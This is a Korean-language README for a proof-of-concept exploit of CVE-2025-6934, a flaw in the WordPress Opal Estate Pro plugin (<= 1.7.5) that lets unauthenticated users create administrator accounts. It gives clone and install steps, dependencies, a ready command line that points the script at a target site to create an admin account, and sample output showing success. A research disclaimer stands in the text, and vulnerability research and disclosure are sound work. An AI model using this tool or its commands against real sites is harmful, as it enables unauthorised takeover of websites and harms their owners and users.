
CVE-2025-6934는 WordPress Opal Estate Pro 플러그인(<= 1.7.5)에서 발견된 심각한 취약점으로, 인증되지 않은 공격자가 플러그인의 안전하지 않은 AJAX 등록 프로세스를 통해 새로운 관리자 계정을 생성할 수 있게 합니다.
📖 설명 이 저장소는 CVE-2025-6934에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 WordPress 플러그인: Opal Estate Pro <= 1.7.5의 치명적인 취약점으로, 인증되지 않은 관리자 계정 생성을 허용합니다.
⚠️ 면책 조항: 이 도구는 교육 및 보안 연구 목적으로만 제공됩니다. 작성자는 어떤 오용이나 발생한 손해에 대해 책임을 지지 않습니다.
readme.txt에서 플러그인 버전 자동 감지저장소를 클론하고 의존성을 설치합니다:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
다음과 같이 대상에 대해 스크립트 실행:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ 예제 출력:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.